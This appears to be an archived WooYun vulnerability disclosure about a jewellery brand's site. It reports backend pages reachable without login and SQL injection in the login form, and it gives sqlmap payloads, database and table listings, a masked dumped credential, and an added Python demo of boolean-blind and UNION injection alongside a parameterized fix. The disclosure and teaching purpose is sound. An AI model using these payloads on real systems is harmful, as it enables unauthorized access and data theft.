WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops article archive --- http://drop.zone.ci/
2016-01-16: Details sent to the vendor; awaiting vendor handling
2016-01-20: Vendor confirmed; details visible to the vendor only
2016-01-30: Details disclosed to core white hats and relevant domain experts
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-03-06: Details disclosed to the public
Kimberlite Diamond: unauthorized access / SQL injection (bundled) / getshell
Kimberlite Diamond official site: into the backend by an odd route, sensitive address disclosure, unauthorized access (plus SQL injection at the backend login)

#1
http://**.**.**.**/index.php?r=site/detail&pid=307
This is an ordinary page, but the URL looked a little odd, so I requested it without the pid parameter:
http://**.**.**.**/index.php?r=site/detail
and something strange appeared:

Following the site's URL convention (index.php?r=controller/action, as seen in the URLs above), I tried:
http://**.**.**.**/index.php?r=site/manage
http://**.**.**.**/index.php?r=site/main
and landed straight on the backend page, with no login required - -!

As above. Also bundled: SQL injection at the backend login page (I stumbled into the backend while injecting by hand - -!, so the two are reported together):
http://**.**.**.**:80/index.php?r=site/bg-login (POST)
Screenshot: the page errors directly
Screenshot: sensitive information
Screenshot: sqlmap
Kimberlite Diamond official site SQL injection: http://**.**.**.**:80/index.php?r=site/bg-login (POST)
sqlmap identified the following injection point(s) with a total of 220 HTTP(s) requests:
---
Parameter: account (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: account=-1898' OR 8667=8667#&pwd=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1
---
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL >= 5.0.0

The later runs resumed the same injection point from the stored session (back-end DBMS reported as MySQL 5) and produced:

available databases [7]:
[*] information_schema
[*] kella
[*] kim
[*] kimberlite
[*] mysql
[*] performance_schema
[*] test

Database: kim
[26 tables]
+------------------+
| join             |
| user             |
| application      |
| brand            |
| caption          |
| classic          |
| classic_list     |
| config           |
| desginer         |
| desginer_list    |
| huodong          |
| images           |
| jiamengshang     |
| jm               |
| kd_list          |
| member           |
| new_push         |
| news             |
| picture          |
| product          |
| product_categroy |
| product_type     |
| source           |
| sqlmapoutput     |
| story_video      |
| zuanshi          |
+------------------+

Database: kim
Table: user
[1 entry]
+------------+------------+
| account    | pwd        |
+------------+------------+
| kim******* | kim******* |
+------------+------------+
With the dumped account and password I logged into the backend.

#2 getshell
Suggested fix: filter and validate input.
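The following is an added example, not code from the WooYun report or from the affected site. It reconstructs the bug class behind the r=site/bg-login injection against an in-memory SQLite database so that the sqlmap output above can be read line by line: why an `OR 8667=8667` payload logs you in and doubles as a true/false oracle (boolean-based blind), why the UNION payload needed exactly four NULL slots ("4 columns"), and how the extracted value rides out through one rendered text column (sqlmap's `CONCAT(0x716b7a6271, ..., 0x7162627071)` just wraps the value in marker strings, "qkzbq" and "qbbpq", so it can find it in the HTML). The `user` table and its rows are constructed sample data; only the column names `account` and `pwd` are taken from the dump. The real handler's code is unknown, so the vulnerable function is an assumed shape of it, and because SQLite has no MySQL `#` comment the payloads end in `-- ` instead. The `login_fixed` function shows the parameterized form that the "filter and validate" advice boils down to.

```python
import sqlite3

# Added example, not code from the WooYun report. Sample data is constructed;
# only the column names `account` and `pwd` come from the page's sqlmap dump.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, account TEXT, pwd TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?, ?)",
        [(1, "admin", "s3cret", "admin"), (2, "bob", "hunter2", "editor")],
    )
    return conn


def login_vulnerable(conn, account, pwd):
    # Assumed shape of the vulnerable login handler: user input is spliced
    # straight into the SQL text. Four selected columns are why a UNION
    # payload must supply exactly four values.
    sql = ("SELECT id, account, pwd, role FROM user "
           f"WHERE account='{account}' AND pwd='{pwd}'")
    return conn.execute(sql).fetchall()


def login_fixed(conn, account, pwd):
    # Parameterized query: values travel separately from the SQL text, so
    # quotes and comment sequences inside `account` cannot alter the statement.
    sql = "SELECT id, account, pwd, role FROM user WHERE account=? AND pwd=?"
    return conn.execute(sql, (account, pwd)).fetchall()


def boolean_oracle(conn, condition):
    # Boolean-based blind: `OR (<condition>)` returns rows iff the condition
    # is true, turning the login form into a yes/no oracle. sqlmap used
    # "8667=8667" as the always-true probe; a subquery on pwd extracts data.
    return len(login_vulnerable(conn, f"-1' OR ({condition})-- ", "1")) > 0


def find_union_columns(conn, max_cols=8):
    # A UNION branch must match the column count of the original SELECT or the
    # statement fails to parse. Counting up until it parses recovers the
    # number sqlmap reports as "4 columns".
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            login_vulnerable(conn, f"1' UNION ALL SELECT {nulls}-- ", "1")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_dump(conn):
    # UNION-based extraction: put the wanted data in the one column the page
    # renders (second column here), NULL in the rest.
    payload = "1' UNION ALL SELECT NULL, account || ':' || pwd, NULL, NULL FROM user-- "
    rows = login_vulnerable(conn, payload, "1")
    return sorted(r[1] for r in rows)


if __name__ == "__main__":
    db = make_db()
    print(boolean_oracle(db, "8667=8667"), boolean_oracle(db, "8667=8668"))
    print(find_union_columns(db))
    print(union_dump(db))
    print(login_fixed(db, "-1' OR 1=1-- ", "1"))
```

The fixed version is not the whole remedy for this report: the backend routes (r=site/manage, r=site/main) were reachable with no session at all, so the login handler also needs an authentication check in front of every backend action, not only a safe query behind the login form.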
Severity: Medium
Vulnerability rank: 10
Confirmed: 2016-01-20 10:14
CNVD has not directly reproduced the described issue and has not yet established a direct handling channel with the site's administering organization; pending claim.
None yet.